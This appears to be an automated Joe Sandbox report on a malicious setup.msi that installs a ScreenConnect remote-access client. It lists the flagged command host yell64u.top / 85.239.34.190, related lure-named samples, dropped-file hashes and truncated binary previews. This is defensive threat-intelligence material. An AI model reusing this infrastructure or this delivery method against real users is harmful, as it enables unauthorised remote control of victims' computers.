                        C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\MSID3F.tmp-\ScreenConnect.Windows.dll0%ReversingLabs
                        C:\Windows\Installer\MSI160A.tmp0%ReversingLabs
                        C:\Windows\Installer\MSI17FF.tmp0%ReversingLabs
                        No Antivirus matches
                        No Antivirus matches
                        No Antivirus matches
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        yell64u.top
                        85.239.34.190
                        truetrue
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://wixtoolset.org/releases/rundll32.exe, 00000003.00000003.1668960516.0000000004C81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1669176626.0000000004B83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668960516.0000000004CF0000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr, Microsoft.Deployment.WindowsInstaller.dll.3.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr, Microsoft.Deployment.Compression.dll.3.drfalse
                            high
                            http://wixtoolset.org/news/rundll32.exe, 00000003.00000003.1668960516.0000000004C81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1669176626.0000000004B83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668960516.0000000004CF0000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr, Microsoft.Deployment.WindowsInstaller.dll.3.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr, Microsoft.Deployment.Compression.dll.3.drfalse
                              high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameScreenConnect.ClientService.exe, 00000006.00000002.2905919832.0000000001952000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000008.00000002.1743451963.0000000002DE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/vrundll32.exe, 00000003.00000003.1668960516.0000000004C81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1669176626.0000000004B83000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000003.00000003.1668960516.0000000004CF0000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.3.dr, Microsoft.Deployment.WindowsInstaller.dll.3.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.3.dr, Microsoft.Deployment.Compression.dll.3.drfalse
                                  high
                                  https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll.3.drfalse
                                    high
                                    https://docs.rs/getrandom#nodejs-es-module-supportScreenConnect.WindowsCredentialProvider.dll.1.drfalse
                                      high
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      85.239.34.190
                                      yell64u.topRussian Federation
                                      134121RAINBOW-HKRainbownetworklimitedHKtrue
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1555428
                                      Start date and time:2024-11-13 21:31:16 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 7m 21s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:13
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:setup.msi
                                      Detection:MAL
                                      Classification:mal80.evad.winMSI@15/54@1/1
                                      EGA Information:
                                      • Successful, ratio: 75%
                                      HCA Information:
                                      • Successful, ratio: 62%
                                      • Number of executed functions: 110
                                      • Number of non-executed functions: 1
                                      Cookbook Comments:
                                      • Found application associated with file extension: .msi
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target rundll32.exe, PID 4820 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                      • VT rate limit hit for: setup.msi
                                      No simulations
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      85.239.34.190statments.exeGet hashmaliciousScreenConnect ToolBrowse
                                        sstatment.exeGet hashmaliciousScreenConnect ToolBrowse
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          yell64u.topstatments.exeGet hashmaliciousScreenConnect ToolBrowse
                                          • 85.239.34.190
                                          sstatment.exeGet hashmaliciousScreenConnect ToolBrowse
                                          • 85.239.34.190
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          RAINBOW-HKRainbownetworklimitedHKuspr2uHV0H.ps1Get hashmaliciousUnknownBrowse
                                          • 85.239.61.60
                                          test.elfGet hashmaliciousUnknownBrowse
                                          • 85.239.34.134
                                          la.bot.m68k.elfGet hashmaliciousUnknownBrowse
                                          • 24.233.26.195
                                          bin.i586.elfGet hashmaliciousGafgyt, MiraiBrowse
                                          • 85.239.34.134
                                          bin.i686.elfGet hashmaliciousGafgyt, MiraiBrowse
                                          • 85.239.34.134
                                          bin.armv7l.elfGet hashmaliciousMiraiBrowse
                                          • 85.239.34.134
                                          bin.i686.elfGet hashmaliciousGafgyt, MiraiBrowse
                                          • 85.239.34.134
                                          bin.x86_64.elfGet hashmaliciousGafgyt, MiraiBrowse
                                          • 85.239.34.134
                                          bin.armv7l.elfGet hashmaliciousMiraiBrowse
                                          • 85.239.34.134
                                          bin.x86_64.elfGet hashmaliciousUnknownBrowse
                                          • 85.239.34.134
                                          No context
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dllmonthly-eStatementForum120478962.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                            monthly-eStatementForum120478962.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                              pzPO97QouM.exeGet hashmaliciousScreenConnect ToolBrowse
                                                pzPO97QouM.exeGet hashmaliciousScreenConnect ToolBrowse
                                                  statments.exeGet hashmaliciousScreenConnect ToolBrowse
                                                    Scanned01Document_ms.exeGet hashmaliciousScreenConnect ToolBrowse
                                                      Scanned01Document_ms.exeGet hashmaliciousScreenConnect ToolBrowse
                                                        sstatment.exeGet hashmaliciousScreenConnect ToolBrowse
                                                          extukGiBrn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                            Vh0tTzx4Ko.exeGet hashmaliciousScreenConnect ToolBrowse
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:modified
                                                              Size (bytes):219478
                                                              Entropy (8bit):6.580652646214445
                                                              Encrypted:false
                                                              SSDEEP:3072:tZ9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMG4:tZuH2aCGw1ST1wQLdqv4
                                                              MD5:17F1F1A5F0505B6DA42A60B8A657A8FF
                                                              SHA1:BAC8CC703D7B832AC44871758FF189908C0A1618
                                                              SHA-256:2FDBF0ACE805F7DF4A1B3DEDC158FB3370A31AA8F8514601E194244CAB9F4EBA
                                                              SHA-512:251E85FFA4F24972DD35DEAF8FF1499B9E108E3614007A4DE27FC6BAA51CC0F9FBCAD20750DBFC41CC0648EF14DB7886ACF0E98E2FA6D0C87C596982A15C58A9
                                                              Malicious:false
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\5c1176.rbs, Author: Joe Security
                                                              Reputation:low
                                                              Preview:...@IXOS.@.....@.|mY.@.....@.....@.....@.....@.....@......&.{64D6109D-BB46-4239-08D9-EC110E53E92E}'.ScreenConnect Client (de5851ad6e374ce3)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{64D6109D-BB46-4239-08D9-EC110E53E92E}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (de5851ad6e374ce3)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{AF52190F-9138-8DD5-E284-9AF07DDE1216}&.{64D6109D-BB46-4239-08D9-EC110E53E92E}.@......&.{5462DCDA-B5AB-15F8-7838-2A54948A34EB}&.{64D6109D-BB46-4239-08D9-EC110E53E92E}.@......&.{41277B46-8511-4FBD-DF82-7BFA9BAEED18}&.{64D6109D-BB46-4239-08D9-EC110E53E92E}.@......&.{E2565D0B-BCDD-C1A1-A2A2-7660FC61A23D}&.{64D6109D-BB46-4239-08D9-EC110E53E92E}.@......&.{A9BEA7A3-6285-A159-CBF3-596C269E6678}&.{64D6109D-BB46-4239-08D9-EC110E53E92E}.@......&.{567A6AC5-C59B-6D1E-4D5E-D3E6B358A6AB}&.{64D6109D-BB46-4239-08D9-EC110E53E92E}.@....
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):652
                                                              Entropy (8bit):4.646296001566109
                                                              Encrypted:false
                                                              SSDEEP:12:rHy2DLI4MWonY6c/KItfU49cAjUPDLm184c7eA7d5TlO5FMDKt5cFqu+HIR:zHE4rbM2xjU7M8LD7DTlcFq0qEIR
                                                              MD5:8B45555EF2300160892C25F453098AA4
                                                              SHA1:0992EBA6A12F7A25C1F50566BEEB3A72D4B93461
                                                              SHA-256:75552351B688F153370B86713C443AC7013DF3EE8FCAC004B2AB57501B89B225
                                                              SHA-512:F99FF9A04675E11BAF1FD2343AB9CE3066BAB32E6BD18AEA9344960BF0A14AF8191DDCCA8431AD52D907BCB0CB47861FFB2CD34655F1852D51E04ED766F03505
                                                              Malicious:false
                                                              Reputation:moderate, very likely benign file
                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP....4..2...n_Q2T}........Z...5...........0A.p.p.l.i.c.a.t.i.o.n.D.i.r.e.c.t.o.r.y.N.a.m.e..... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....2B.l.a.n.k.M.o.n.i.t.o.r.M.e.s.s.a.g.e.F.o.r.m.a.t.....RE.n.d.P.o.i.n.t.S.t.a.t.u.s.S.l.e.e.p.i.n.g.F.o.r.F.r.e.e.L.i.c.e.n.s.e.T.i.t.l.e.F...FS.e.s.s.i.o.n.I.n.v.a.l.i.d.S.e.s.s.i.o.n.D.e.l.e.t.e.d.M.e.s.s.a.g.e.t.....Support..Support.2Software is Updating.Do not turn off your computer.,Not enough data receiving from host computer..Removed
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):21018
                                                              Entropy (8bit):7.841465962209068
                                                              Encrypted:false
                                                              SSDEEP:384:rcoN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dH:P4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bd
                                                              MD5:EF6DBD4F9C3BB57F1A2C4AF2847D8C54
                                                              SHA1:41D9329C5719467E8AE8777C2F38DE39F02F6AE4
                                                              SHA-256:0792210DE652583423688FE6ACAE19F3381622E85992A771BF5E6C5234DBEB8E
                                                              SHA-512:5D5D0505874DC02832C32B05F7E49EAD974464F6CB50C27CE9393A23FF965AA66971B3C0D98E2A4F28C24147FCA7A0A9BFD25909EC7D5792AD40CED7D51ED839
                                                              Malicious:false
                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP......jF.1P)..../._.ks`.k.`.k.M6pb.......'...........w.......P...1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6..'..(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2..1..0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2..;..,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6..E..6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.xO.. .....PNG........IHDR...-...-.....:......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs...:...:..d.J...NIDATX...{pT.......$\..................h.m+Z.....I.R.... X.E...V+.^.......i...F.;..IDH..?.l. ..S.qxg2...}.../.y.......r1E..?......*.K[...D.../L....u..n....$!R..Jh...?.dSUX..*.V%..Jy.-.
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):50133
                                                              Entropy (8bit):4.759054454534641
                                                              Encrypted:false
                                                              SSDEEP:1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
                                                              MD5:D524E8E6FD04B097F0401B2B668DB303
                                                              SHA1:9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
                                                              SHA-256:07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
                                                              SHA-512:E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
                                                              Malicious:false
                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..*v.......B....A...a......D..c..w..K,..t...S.....*v....7.6|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):26722
                                                              Entropy (8bit):7.7401940386372345
                                                              Encrypted:false
                                                              SSDEEP:384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
                                                              MD5:5CD580B22DA0C33EC6730B10A6C74932
                                                              SHA1:0B6BDED7936178D80841B289769C6FF0C8EEAD2D
                                                              SHA-256:DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
                                                              SHA-512:C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
                                                              Malicious:false
                                                              Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..*B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..*D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):197120
                                                              Entropy (8bit):6.58476728626163
                                                              Encrypted:false
                                                              SSDEEP:3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
                                                              MD5:AE0E6EBA123683A59CAE340C894260E9
                                                              SHA1:35A6F5EB87179EB7252131A881A8D5D4D9906013
                                                              SHA-256:D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
                                                              SHA-512:1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Joe Sandbox View:
                                                              • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious, Browse
                                                              • Filename: monthly-eStatementForum120478962.Client.exe, Detection: malicious, Browse
                                                              • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                              • Filename: pzPO97QouM.exe, Detection: malicious, Browse
                                                              • Filename: statments.exe, Detection: malicious, Browse
                                                              • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                              • Filename: Scanned01Document_ms.exe, Detection: malicious, Browse
                                                              • Filename: sstatment.exe, Detection: malicious, Browse
                                                              • Filename: extukGiBrn.exe, Detection: malicious, Browse
                                                              • Filename: Vh0tTzx4Ko.exe, Detection: malicious, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):68096
                                                              Entropy (8bit):6.068776675019683
                                                              Encrypted:false
                                                              SSDEEP:1536:tA0ZscQ5V6TsQqoSDKh6+39QFVIl1KJhb8gp:q0Zy3wUOQFVQKJp
                                                              MD5:0402CF8AE8D04FCC3F695A7BB9548AA0
                                                              SHA1:044227FA43B7654032524D6F530F5E9B608E5BE4
                                                              SHA-256:C76F1F28C5289758B6BD01769C5EBFB519EE37D0FA8031A13BB37DE83D849E5E
                                                              SHA-512:BE4CBC906EC3D189BEBD948D3D44FCF7617FFAE4CC3C6DC49BF4C0BD809A55CE5F8CD4580E409E5BCE7586262FBAF642085FA59FE55B60966DB48D81BA8C0D78
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.T..........." ..0.............. ... ...@....... ..............................d.....@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):95520
                                                              Entropy (8bit):6.505346220942731
                                                              Encrypted:false
                                                              SSDEEP:1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
                                                              MD5:361BCC2CB78C75DD6F583AF81834E447
                                                              SHA1:1E2255EC312C519220A4700A079F02799CCD21D6
                                                              SHA-256:512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
                                                              SHA-512:94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):548864
                                                              Entropy (8bit):6.031251664661689
                                                              Encrypted:false
                                                              SSDEEP:6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
                                                              MD5:16C4F1E36895A0FA2B4DA3852085547A
                                                              SHA1:AB068A2F4FFD0509213455C79D311F169CD7CAB8
                                                              SHA-256:4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
                                                              SHA-512:AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:...*..{;...*V.(<.....}:.....};...*...0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...*.*.*. ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X*...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D...*..{E...*..{F...*V.(<.....}E.....}F...*.0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...*.*.*. F.b# )UU.
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1721856
                                                              Entropy (8bit):6.639136400085158
                                                              Encrypted:false
                                                              SSDEEP:24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
                                                              MD5:9F823778701969823C5A01EF3ECE57B7
                                                              SHA1:DA733F482825EC2D91F9F1186A3F934A2EA21FA1
                                                              SHA-256:ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
                                                              SHA-512:FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...*^.()..........%...}....*:.().....}....*:.().....}....*:.().....}....*..s*...*..s+...*:.(,.....(-...*..{....*"..}....*J.(/........(0...&*:.(,.....(1...*..{2...*"..}2...*.0..(........(3......+.............(0...&..X....i2.*v.(,....s4...}.....s5...}....*v.{.....r...p(...+.....o7....*.0...........o8....+..o9......(...+&.o....-....,..o......*..........."........{..........o:...&.......(.....*....0..L...
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):260168
                                                              Entropy (8bit):6.416438906122177
                                                              Encrypted:false
                                                              SSDEEP:3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
                                                              MD5:5ADCB5AE1A1690BE69FD22BDF3C2DB60
                                                              SHA1:09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
                                                              SHA-256:A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
                                                              SHA-512:812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................
                                                              Process:C:\Windows\System32\msiexec.exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):61216
                                                              Entropy (8bit):6.31175789874945
                                                              Encrypted:false
                                                              SSDEEP:1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
                                                              MD5:6DF2DEF5E591E2481E42924B327A9F15
                                                              SHA1:38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
                                                              SHA-256:B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
                                                              SHA-512:5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
